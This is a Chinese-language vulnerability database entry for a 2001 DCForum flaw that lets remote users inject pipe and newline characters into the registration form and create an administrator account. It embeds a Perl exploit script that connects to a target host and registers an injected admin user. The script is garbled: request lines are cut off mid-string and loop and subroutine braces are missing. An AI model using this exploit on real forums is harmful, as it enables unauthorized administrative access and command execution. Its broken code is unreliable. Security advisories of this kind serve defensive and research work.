发布时间 :2001-08-14 00:00:00
修订时间 :2017-10-09 21:29:46

[原文]DCScripts DCForum versions 2000 and earlier allow a remote attacker to gain additional privileges by inserting pipe symbols (|) and newlines into the last name in the registration form, which will create an extra entry in the registration database.



- CVSS (基础分值)

CVSS分值: 10 [严重(HIGH)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)


- OVAL (用于检测的技术细节)


- 官方数据库链接
(官方数据源) MITRE
(官方数据源) NVD
(官方数据源) CNNVD

- 其它链接及资源
(VENDOR_ADVISORY)  BUGTRAQ  20010515 DCForum Password File Manipukation Vulnerability (qDefense Advisory Number QDAV-5-2000-2)
(UNKNOWN)  BID  2728
(UNKNOWN)  XF  dcforum-cgi-admin-access(6538)

- 漏洞信息

危急 输入验证
2001-08-14 00:00:00 2005-05-02 00:00:00

- 公告与补丁

        DC Scripts
        DC Scripts DCForum 2000 1.0:
        DC Scripts Patch 2000

        DC Scripts DCForum 6.0:
        DC Scripts Patch 6.0

- 漏洞信息 (20849)

DCForum 6.0 Remote Admin Privilege Compromise Vulnerability (EDBID:20849)
cgi remote
2001-05-08 Verified
0 Franklin DeMatto
N/A [点击下载]

DCForum is a commercial cgi script from DCScripts which is designed to facilitate web-based threaded discussion forums.

Versions of DCForum are vulnerable to attacks which can yield an elevation of privileges and remote execution of arbitrary commands.

DCForum maintains a file containing its user account information, including hashed user passwords and other potentially sensitive information.

When a new user account is created, the user's information is written to this file. Fields within each record are delimited by pipe ('|') and newline characters.

DCForum fails to properly validate this user-supplied account information. As a result, an attacker can cause a corruption of the script's user records by providing a value for the last name field which includes URL-encoded pipes and newlines. By appending desired values to the last name field, an attacker can insert account information for a new user, and specify admin privileges.

This newly-created admin account allows a remote attacker to issue arbitrary commands with the privilege level of the webserver process. 


# - (C) 2001 Franklin DeMatto -

use Getopt::Std;
use IO::Socket;

getopts ('ap');

usage () unless ($#ARGV == 0 || $#ARGV == 1);
if ($opt_a) { print "\n -a not implemented yet\n\n"; exit 1; }

$host = $ARGV[0];
$uri =  $ARGV[1] ? $ARGV[1] : '/cgi-bin/dcforum/dcboard.cgi';

$username = 'evilhacker' .  ( int rand(9899) + 100); 
$password = int rand  (9899) + 100;
$hash = $opt_p ? $password : crypt ($password, substr ($password, 0, 2));
$dummyuser = 'not' . ( int rand(9899) + 100) ;
$dummypass = int rand (9899) + 100;

print "\n(Debugging info: Hash = $hash    Dummyuser = $dummyuser    Dummypass =
print "Attempting to register username $username with password $password as admin . . .\n";

$sock = IO::Socket::INET->new("$host:80") or die "Unable to connect to $host: $!\n\n";
$req = "GET
$req .=
$req .= "&required=Password%2cUsername%2cFirstname%2cLastname%2cEMail HTTP/1.0\015\012";
$req .= "Host: $host\015\012\015\012";

print $sock $req;

print "The server replied:\n\n";

while (<$sock>)
  if (/BODY/) { $in_body = 1; }
  next unless $in_body;
  if (/form|<\/BODY>/) { last; }
  print $_ unless (/^\s*$/);
  print "\nNote: Even if your password is supposed to be e-mailed to you, it should work
right away.\n";

sub usage
  print <<EOF; - (C) 2001 Franklin DeMatto - franklin\

Usage: $0 [options] host [path to dcboard.cgi]

   -a to activate the account (for sites that do not activate automatically)
  NOTE: This option is not yet supported, but should be quite easy to add if you need it
  -p to leave the password in plaintext (necessary when the target is NT)

The path to dcboard.cgi, if not supplied, is assumed to be /cgi-bin/dcforum/dcboard.cgi

  exit 1;


- 漏洞信息

DCForum dcboard.cgi Arbitrary Admin Account Creation
Remote / Network Access Input Manipulation
Loss of Integrity Upgrade
Exploit Public Third-party Verified

- 漏洞描述

DCForum contains a flaw that allows a remote attacker to create an arbitrary administrative account. Due to a flaw in the process of creating a new user, proper sanitization is not applied to input. This allows an attacker to supply a pipe (|) and arbitrary text in the form of an additional user account, which will be added to the password file.

- 时间线

2001-05-15 Unknow
2001-05-15 Unknow

- 解决方案

Upgrade to version 6.25 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

Unknown or Incomplete